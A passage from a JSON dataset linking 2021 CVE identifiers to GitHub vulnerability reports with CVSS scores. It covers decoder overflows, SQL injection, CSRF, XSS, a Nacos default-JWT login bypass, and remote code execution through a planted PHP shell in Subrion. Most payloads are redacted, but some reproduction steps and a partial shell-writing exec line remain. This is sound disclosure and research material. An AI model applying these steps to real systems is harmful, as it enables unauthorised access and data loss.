        "Issue_Url_new": "https://github.com/nothings/stb/issues/1224",
        "Repo_new": "nothings/stb",
        "Issue_Created_At": "2021-10-07T20:06:19Z",
        "description": "In stb_image's HDR reader, loading a specially constructed invalid HDR file can result in an infinite loop within the RLE decoder. Describe the bug In stb_image's HDR reader, loading a specially constructed invalid HDR file can result in an infinite loop within the RLE decoder. This issue includes a fix in pull request NUMBERTAG and a proof of concept file that can be used to reproduce the crash. We're reporting this on APITAG Issues following the guidance in issue NUMBERTAG The issue occurs in this loop URLTAG within APITAG : CODETAG The proof of concept file manages to get this part of the decoder into a state where: nleft is equal to NUMBERTAG s is at the end of the file. Because s is at the end of the file, APITAG always returns NUMBERTAG since APITAG here: CODETAG This means that count is always set to NUMBERTAG this passes the error check, but doesn't affect any program state, meaning that the loop runs forever, an availability issue. To Reproduce This .zip contains a NUMBERTAG KB .hdr file, APITAG which reproduces this issue: FILETAG Calling APITAG with a path to this file never returns. I was able to verify this using tests/image_test.c (modified slightly in order to build) on Windows version NUMBERTAG H2 with Microsoft Visual Studio NUMBERTAG and I expect it should reproduce on other systems as well. This file was found using the Radamsa fuzzer URLTAG . I think this particular file works by setting the RLE flags on the last scanline in the file and being truncated in just the right place, but I'm not NUMBERTAG sure. Expected behavior stbi_load should eventually return. Based on Bruce Walter's FILETAG , it seems like the intended behavior is that a run length of NUMBERTAG should be treated as invalid, which is the approach the pull request takes. However, other solutions are possible (e.g. detecting when the end of the file has been reached) I don't have any preference either way. Thanks!",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-42716",
        "Issue_Url_old": "https://github.com/nothings/stb/issues/1166",
        "Issue_Url_new": "https://github.com/nothings/stb/issues/1166",
        "Repo_new": "nothings/stb",
        "Issue_Created_At": "2021-07-14T10:52:47Z",
        "description": "stbi__pnm_load heap buffer overflow bug . i find a heap buffer overflow(oob read) FILETAG in stbi__pnm_load, if req_comp && req_comp != s >img_n, the will call stbi__convert_format, But it does not multiply ri >bits_per_channel NUMBERTAG if ri.bits_per_channel NUMBERTAG will call stbi__convert NUMBERTAG to NUMBERTAG and make oob read APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-42716",
        "Issue_Url_old": "https://github.com/nothings/stb/issues/1225",
        "Issue_Url_new": "https://github.com/nothings/stb/issues/1225",
        "Repo_new": "nothings/stb",
        "Issue_Created_At": "2021-10-07T20:08:31Z",
        "description": "In stb_image's PNM reader, loading a specially constructed valid NUMBERTAG bit PGM file with NUMBERTAG channels can cause a crash due to an out of bounds read. Summary stb_image's PNM loader in version NUMBERTAG incorrectly interpreted NUMBERTAG bit PGM files as NUMBERTAG bit when converting to RGBA, leading to buffer overflow when later reinterpreting the result as a NUMBERTAG bit buffer. An attacker could potentially have crashed a service using stb_image, or read up to NUMBERTAG bytes of non consecutive heap data without control over the read location. CVE number: CVETAG URLTAG Describe the bug In stb_image's PNM reader, loading a valid NUMBERTAG bit PGM file that is large enough with the number of components set to NUMBERTAG can cause a crash in APITAG due to an out of bounds read. This issue includes a fix in pull request NUMBERTAG and a proof of concept file that can be used to reproduce the crash. We're reporting this on APITAG Issues following the guidance in issue NUMBERTAG This appears to be due to how when APITAG loads a NUMBERTAG bit PGM file with N bytes of data, it incorrectly calls APITAG instead of APITAG , returning a buffer that is NUMBERTAG N bytes long instead of NUMBERTAG N bytes. Since APITAG is still NUMBERTAG when control returns to APITAG , APITAG attempts to read APITAG bytes of data from this buffer, resulting in out of bounds reads. When N is large enough, this results in an access violation. To Reproduce This .zip contains a NUMBERTAG KB .pgm file, APITAG which reproduces this issue: FILETAG Calling APITAG with a path to this file and with a req_comp of NUMBERTAG produces a crash. I was able to verify this using tests/image_test.c (modified slightly in order to build) on Windows version NUMBERTAG H2 with Microsoft Visual Studio NUMBERTAG and I expect it should reproduce on other systems as well. This file was generated using the following Python script, and should be a valid PGM file: APITAG It was derived from an example found using the Radamsa fuzzer URLTAG . Interestingly, PATHTAG is also a NUMBERTAG bit PGM file, but reading it doesn't cause a crash! I believe the reason is because this is a NUMBERTAG image, so it only includes N NUMBERTAG bytes of image data, and as a result the out of bounds reads don't cross a page boundary that would result in an access violation. Expected behavior The example file should be loaded without crashing. Screenshots Here's a screenshot showing where the crash occurs and the call stack, when run with the example file in image_test.c. APITAG that the call in image_test.c may be off by NUMBERTAG lines; the specific callsite is APITAG .) FILETAG Thanks!",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-42870",
        "Issue_Url_old": "https://github.com/xebd/accel-ppp/issues/158",
        "Issue_Url_new": "https://github.com/xebd/accel-ppp/issues/158",
        "Repo_new": "xebd/accel-ppp",
        "Issue_Created_At": "2021-10-18T14:22:42Z",
        "description": "Abnormal packet sequence can cause stack buffer underflow. Using version APITAG . Summary Sending PPTP Call Clear Request Packet after PPTP Start Control Connection Request and PPTP Outgoing Call Request to server can cause ERRORTAG . APITAG Here is the detailed information of sent packets: Packet NUMBERTAG CODETAG Packet NUMBERTAG CODETAG Packet NUMBERTAG CODETAG Hint: the APITAG field is randomly generated thus directly forwarding those three packets might not reproduce the scene. To reproduce it, it's neccessary to construct similar packets. Crash report log of server: ERRORTAG Here is the asan report: ERRORTAG Reproduce info Build APITAG : CODETAG Run APITAG , use the following command: APITAG The running configuration APITAG is: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-42970",
        "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/8",
        "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/8",
        "Repo_new": "cbkhwx/cxuucmsv3",
        "Issue_Created_At": "2021-10-24T02:33:04Z",
        "description": "A xss vulnerability was discovered in cxuucms NUMBERTAG There is a Persistent XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the imgurl of PATHTAG parameter :content POC APITAG APITAG Then view the webpage named test xss in admin feedback list page , XSS vulnerability is triggered successfully. APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43116",
        "Issue_Url_old": "https://github.com/alibaba/nacos/issues/7182",
        "Issue_Url_new": "https://github.com/alibaba/nacos/issues/7182",
        "Repo_new": "alibaba/nacos",
        "Issue_Created_At": "2021-11-05T07:48:43Z",
        "description": "Found a login background vulnerability. The steps to APITAG FILETAG APITAG the latest version of APITAG URLTAG APITAG the steps for installation APITAG the installation is successful, access the default login page FILETAG APITAG any account and password Click login and the login failed FILETAG APITAG at login time FILETAG Intercepting return packet FILETAG The intercepted return packet is FILETAG APITAG returns the package and lets it pass FILETAG The packet is: HTTP NUMBERTAG Server: APITAG Date: Sun NUMBERTAG Apr NUMBERTAG GMT Content Type: application/json;charset=UTF NUMBERTAG Connection: close Vary: Origin Vary: Access Control Request Method Vary: Access Control Request Headers Access Control Allow Origin: URLTAG Access Control Allow Credentials: true Authorization: Bearer APITAG Content Length NUMBERTAG APITAG NUMBERTAG At this point you can see that you have successfully entered the background FILETAG The reason for this problem is that NACOS uses the default JWT key",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43116",
        "Issue_Url_old": "https://github.com/alibaba/nacos/issues/7127",
        "Issue_Url_new": "https://github.com/alibaba/nacos/issues/7127",
        "Repo_new": "alibaba/nacos",
        "Issue_Created_At": "2021-10-26T10:13:19Z",
        "description": "A vulnerability was found that could cause any existing user to log in. APITAG Describe the bug A clear and concise description of what the bug is. A vulnerability was found that could cause any existing user to log in Expected behavior A clear and concise description of what you expected to happen. Acutally behavior A clear and concise description of what you actually to happen. How to Reproduce Steps to reproduce the behavior NUMBERTAG Download the latest version of APITAG NUMBERTAG Access prompt page FILETAG NUMBERTAG Enter any user name and APITAG login to capture packets Change the returned package to the following FILETAG FILETAG HTTP NUMBERTAG Server: APITAG Date: Sun NUMBERTAG Apr NUMBERTAG GMT Content Type: application/json;charset=UTF NUMBERTAG Connection: close Vary: Origin Vary: Access Control Request Method Vary: Access Control Request Headers Access Control Allow Origin: URLTAG Access Control Allow Credentials: true Authorization: Bearer APITAG Content Length NUMBERTAG APITAG NUMBERTAG We can see the successful login FILETAG Desktop (please complete the following information): OS: [e.g. Centos] Version APITAG Module [e.g. naming/config] SDK [e.g. original, spring cloud alibaba nacos, dubbo] Additional context Add any other context about the problem here.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43155",
        "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/18",
        "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/18",
        "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
        "Issue_Created_At": "2021-10-30T12:45:40Z",
        "description": "SQL Injection vulnerability via the \"bookisbn\" parameter in FILETAG . Author APITAG ( APITAG Version NUMBERTAG Proof of concept CODETAG Response in Burpsuite FILETAG View source code FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG Remediation Please validate input of \" bookisbn \" parameter in APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43156",
        "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/19",
        "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/19",
        "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
        "Issue_Created_At": "2021-10-31T05:35:12Z",
        "description": "CSRF vulnerability in FILETAG allows a remote attacker to delete any book. Author APITAG ( APITAG Version NUMBERTAG Details The GET request for deleting a book with APITAG looks like this: APITAG Changing the value of the bookisbn parameter under admin privilege will delete the book with that ISBN. A remote attacker can embed the request into an innocent looking hyperlink: APITAG Step to reproduce NUMBERTAG First, create a malicious HTML page then host a website containing that page. APITAG CODETAG NUMBERTAG Entice the admin to click on the link to the malicious site. When the admin browses to that site, the link would be automatically clicked via APITAG and the book will be deleted. Response in Burpsuite FILETAG FILETAG Source code review FILETAG FILETAG Remediation Implement an Anti CSRF Token.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43157",
        "Issue_Url_old": "https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/1",
        "Issue_Url_new": "https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/1",
        "Repo_new": "projectworldsofficial/online-shopping-webvsite-in-php",
        "Issue_Created_At": "2021-10-31T12:18:55Z",
        "description": "SQL Injection vulnerability via the \"id\" parameter in FILETAG . Author APITAG ( APITAG Version NUMBERTAG Steps to reproduce NUMBERTAG A customer login to the store (to be able to access Cart page NUMBERTAG Add any product to cart NUMBERTAG Go to Cart page NUMBERTAG Click on \" Remove \" button to remove a product NUMBERTAG Intercept the request and insert the payload in the value of the id parameter. Example payload: APITAG Proof of concept CODETAG Response in Burpsuite FILETAG Source code review FILETAG FILETAG Remediation Validate input of id parameter in APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43158",
        "Issue_Url_old": "https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/2",
        "Issue_Url_new": "https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/2",
        "Repo_new": "projectworldsofficial/online-shopping-webvsite-in-php",
        "Issue_Created_At": "2021-10-31T12:31:11Z",
        "description": "CSRF vulnerability in FILETAG allows a remote attacker to remove any product in the customer's cart. Author APITAG ( APITAG Version NUMBERTAG Details The GET request for removing a prodcut with APITAG looks like this: APITAG Changing the value of the id parameter in the customer session will remove the product with that ID. A remote attacker can embed the request into an innocent looking hyperlink: APITAG Step to reproduce NUMBERTAG First, create a malicious HTML page then host a website containing that page. APITAG CODETAG NUMBERTAG Entice the customer to click on the link to the malicious site. When the customer browses to that site, the link would be automatically clicked via APITAG and the product will be removed. Response in Burpsuite FILETAG FILETAG Source code review FILETAG FILETAG Remediation Implement an Anti CSRF Token.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43177",
        "Issue_Url_old": "https://github.com/tinfoil/devise-two-factor/issues/106",
        "Issue_Url_new": "https://github.com/tinfoil/devise-two-factor/issues/106",
        "Repo_new": "tinfoil/devise-two-factor",
        "Issue_Created_At": "2017-03-07T21:58:24Z",
        "description": "A consumed otp becomes valid again within the drift period. If an otp is consumed, it becomes invalid during the APITAG of the instantiated APITAG object in APITAG APITAG is currently always NUMBERTAG seconds, since that is the default: URLTAG However, during the drift period specified by APITAG , the otp again becomes valid. I believe this is unexpected behavior, and the intention is for an otp to not be reusable within the drift period after it has been consumed. Here are some specs dropped in here URLTAG which currently fail: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 3.6,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2021-43298",
        "Issue_Url_old": "https://github.com/embedthis/goahead/issues/304",
        "Issue_Url_new": "https://github.com/embedthis/goahead/issues/304",
        "Repo_new": "embedthis/goahead",
        "Issue_Created_At": "2021-08-10T02:59:10Z",
        "description": "Constant time password comparisons. Summary The password comparison routine employed in versions up to NUMBERTAG used a fail fast comparison which assist brute force password attacks. Detail The APITAG routine used the smatch routine which uses sncmp. This routine would fail as soon as a mismatch was detected. This fail fast behavior may provide information to remove brute force attacks and guide attackers into better password guesses by helping them focus their attacks. Threat Scope and Mitigation The attacker would need persistent access to a high speed network to perform the attack. If the password length is long, the threat level is lower, but a short password could be more vulnerable. Remedy Deploy APITAG NUMBERTAG Please contact Embedthis if you require further information, test code or assistance at EMAILTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43421",
        "Issue_Url_old": "https://github.com/Studio-42/elFinder/issues/3429",
        "Issue_Url_new": "https://github.com/studio-42/elfinder/issues/3429",
        "Repo_new": "studio-42/elfinder",
        "Issue_Created_At": "2021-11-01T11:06:24Z",
        "description": "RCE APITAG NUMBERTAG Describe the bug bypass ext check Steps to reproduce the behavior NUMBERTAG create a .php file using the following URL: URLTAG APITAG file : URLTAG APITAG PHP code in FILETAG URLTAG echo APITAG p (please complete the following information): OS: Windows XAMPP",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43429",
        "Issue_Url_old": "https://github.com/Seagate/cortx-s3server/issues/1037",
        "Issue_Url_new": "https://github.com/seagate/cortx-s3server/issues/1037",
        "Repo_new": "seagate/cortx-s3server",
        "Issue_Created_At": "2021-07-18T08:19:31Z",
        "description": "Potential error due to the unreleased lock . Dear developers: Thank you for your checking. In the method APITAG , the lock APITAG may be not released if the branch condition satisfies and the method returns. URLTAG URLTAG CODETAG Best,",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43453",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4754",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4754",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2021-08-28T22:00:46Z",
        "description": "Heap overflow on an ill formed JS program. APITAG revision APITAG Build platform ERRORTAG Build steps APITAG Test case There are two test cases, where APITAG can trigger a direct crash of the clean built jerry and APITAG can trigger a heap overflow of the ASAN enabled built jerry. This bug is found by a naive fuzzer. And I use APITAG to reduce the test cases. I sincerely apologize for making them struggling. + FILETAG ERRORTAG + FILETAG ERRORTAG Execution steps APITAG ERRORTAG Output See above. Backtrace See above. Expected behavior Not to crash",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43464",
        "Issue_Url_old": "https://github.com/intelliants/subrion/issues/888",
        "Issue_Url_new": "https://github.com/intelliants/subrion/issues/888",
        "Repo_new": "intelliants/subrion",
        "Issue_Created_At": "2021-11-03T02:21:06Z",
        "description": "There is a remote command execution vulnerability. Remote code execution vulnerabilities in the background Affected version subrion NUMBERTAG lates login address URLTAG Find Fields after login FILETAG On the right are the operations related to the column, choose one here, select Facebook FILETAG open Required field FILETAG Validation PHP code can enter any php code, here is a sentence of Trojan exec('echo ^ APITAG PATHTAG );exec('echo APITAG Off ^ APITAG PATHTAG ); Then go to APITAG to trigger it FILETAG At this time, you can access the shell and execute any command FILETAG principle The reason is that the code at the background Fields will be written to the database FILETAG Then when the information is modified, the data in it will be executed through APITAG FILETAG Proposed changes The incoming Validation PHP code adds filtering for sensitive functions, such as APITAG , APITAG , etc.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43478",
        "Issue_Url_old": "https://github.com/kr0za/bugs/issues/1",
        "Issue_Url_new": "https://github.com/kr0za/bugs/issues/1",
        "Repo_new": "kr0za/bugs",
        "Issue_Created_At": "2021-11-03T14:09:05Z",
        "description": "install bug. In FILETAG , it is not checked whether FILETAG already exists in the website root directory. The install directory is not automatically deleted after the system installation. When you visit /install again, reinstall the website again. APITAG Installation succeeded APITAG The install directory is not automatically deleted after the system is installed,visit /install again APITAG The website was reinstalled APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.5,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43479",
        "Issue_Url_old": "https://github.com/mikaelstaer/The-Secretary/issues/10",
        "Issue_Url_new": "https://github.com/mikaelstaer/the-secretary/issues/10",
        "Repo_new": "mikaelstaer/the-secretary",
        "Issue_Created_At": "2021-11-04T08:53:43Z",
        "description": "install rce. my env\uff1a Version NUMBERTAG php NUMBERTAG windows At APITAG input was saved to PATHTAG causing RCE APITAG APITAG Create a new database named APITAG and then visit FILETAG to install the website APITAG Then visit PATHTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43492",
        "Issue_Url_old": "https://github.com/AlquistManager/alquist/issues/42",
        "Issue_Url_new": "https://github.com/alquistmanager/alquist/issues/42",
        "Repo_new": "alquistmanager/alquist",
        "Issue_Created_At": "2021-09-22T20:04:48Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43493",
        "Issue_Url_old": "https://github.com/cksgf/ServerManagement/issues/21",
        "Issue_Url_new": "https://github.com/cksgf/servermanagement/issues/21",
        "Repo_new": "cksgf/servermanagement",
        "Issue_Created_At": "2021-09-22T23:11:43Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43494",
        "Issue_Url_old": "https://github.com/codingforentrepreneurs/OpenCV-REST-API/issues/2",
        "Issue_Url_new": "https://github.com/codingforentrepreneurs/opencv-rest-api/issues/2",
        "Repo_new": "codingforentrepreneurs/opencv-rest-api",
        "Issue_Created_At": "2021-09-22T22:50:48Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43495",
        "Issue_Url_old": "https://github.com/AlquistManager/alquist/issues/43",
        "Issue_Url_new": "https://github.com/alquistmanager/alquist/issues/43",
        "Repo_new": "alquistmanager/alquist",
        "Issue_Created_At": "2021-09-22T22:32:57Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43496",
        "Issue_Url_old": "https://github.com/varun-suresh/Clustering/issues/12",
        "Issue_Url_new": "https://github.com/varun-suresh/clustering/issues/12",
        "Repo_new": "varun-suresh/clustering",
        "Issue_Created_At": "2021-09-22T22:24:23Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43521",
        "Issue_Url_old": "https://github.com/HardySimpson/zlog/issues/206",
        "Issue_Url_new": "https://github.com/hardysimpson/zlog/issues/206",
        "Repo_new": "hardysimpson/zlog",
        "Issue_Created_At": "2021-11-03T09:30:35Z",
        "description": "stack buffer overflow at zlog_conf_build_with_file . Hi, I found a stack buffer overflow at zlog_conf_build_with_file PATHTAG Here is the stack backtrace: ERRORTAG Of course , I byte read overflow is not important. But you can see, \"p\" It will read the memory that is underflow the \"line\" buffer. If there is exactly NUMBERTAG or NUMBERTAG or anthiny that means \"space\", \"p\" will go on move and the next \"p++\" will cause a write overflow. That is really a bug. Sepecally, I think the byte read overflow is like an address. So , there will be a crash or other wired things. If I'm right? If you need the crash case you can tell me.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43579",
        "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/453",
        "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/453",
        "Repo_new": "michaelrsweet/htmldoc",
        "Issue_Created_At": "2021-11-04T15:10:19Z",
        "description": "Stack buffer overflow in APITAG In APITAG , the APITAG variable is read from the BMP file header and directly used to read into a fixed size buffer. CODETAG A maliciously crafted BMP file could set the APITAG variable to a number big enough to overflow the stack and thus the return address. I am attaching a proof of concept below. It can be tested with: APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-43579",
        "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/456",
        "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/456",
        "Repo_new": "michaelrsweet/htmldoc",
        "Issue_Created_At": "2021-12-11T09:15:18Z",
        "description": "Stack Buffer Overflow with BMP files Version NUMBERTAG The fix for the issue FILETAG does not completely protect against a stack buffer overflow in APITAG . It is possible to control the read in buffer colormap through the APITAG variable. The previous fix does not mitigate the issue as the APITAG is an integer , therefore, regardless of the ERRORTAG return of APITAG the buffer can be overflowed. CODETAG As an example, if APITAG is APITAG the if statement validates the variable and leads to a buffer overflow. Impact This buffer overflow can lead to modifying the instruction pointer and can therefore lead to remote code execution. FILETAG POC: FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-43616",
        "Issue_Url_old": "https://github.com/npm/cli/issues/2701",
        "Issue_Url_new": "https://github.com/npm/cli/issues/2701",
        "Repo_new": "npm/cli",
        "Issue_Created_At": "2021-02-15T03:57:16Z",
        "description": "[BUG] npm ci succeeds when APITAG doesn't match APITAG . Current Behavior: npm ci does not fail when APITAG doesn't match APITAG Expected Behavior: npm ci refuses to install when the lock file is invalid. Steps To Reproduce NUMBERTAG Manually bump a major version of a dependency in APITAG NUMBERTAG Run npm ci NUMBERTAG It should fail but performs the whole installation npm MENTIONTAG APITAG npm MENTIONTAG APITAG Environment: OS: Mac OS Node NUMBERTAG npm NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43620",
        "Issue_Url_old": "https://github.com/nvzqz/fruity/issues/14",
        "Issue_Url_new": "https://github.com/nvzqz/fruity/issues/14",
        "Repo_new": "nvzqz/fruity",
        "Issue_Created_At": "2021-10-31T23:36:20Z",
        "description": "Display for APITAG truncates at null bytes. This issue was originally reported privately, but I thought I should create an issue to inform others about it, as it has not yet been fixed. The implementation of FILETAG for FILETAG truncates at null bytes, since it uses APITAG URLTAG . It should be possible to use APITAG URLTAG and APITAG URLTAG instead to create the complete string. Example: APITAG That example only prints the string \"null\". Since APITAG URLTAG uses FILETAG to create strings, it has the same issue. APITAG URLTAG and APITAG URLTAG also have the same issue. If you believe this is a valid issue, I encourage you to file a security advisory at URLTAG including a patch version if it is possible to release within two weeks. Thank you for your work on this crate. Creating a security advisory is not meant to be anything other than a way to provide information to other users.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43628",
        "Issue_Url_old": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/2",
        "Issue_Url_new": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/2",
        "Repo_new": "projectworldsofficial/hospital-management-system-in-php",
        "Issue_Created_At": "2021-11-08T04:40:11Z",
        "description": "SQL Injection vulnerability via the \"email\" parameter in FILETAG . Author APITAG ( APITAG Version NUMBERTAG Steps to reproduce NUMBERTAG Go to Staff Login page NUMBERTAG Input username , password and choose Admin in the User Type NUMBERTAG Click on the Login button NUMBERTAG Intercept the request and insert the payload in the value of the email parameter. Example payload: APITAG Proof of concept CODETAG Response in Burpsuite FILETAG Source code review FILETAG FILETAG FILETAG FILETAG Remediation Validate input of email parameter in APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43629",
        "Issue_Url_old": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/3",
        "Issue_Url_new": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/3",
        "Repo_new": "projectworldsofficial/hospital-management-system-in-php",
        "Issue_Created_At": "2021-11-08T09:53:16Z",
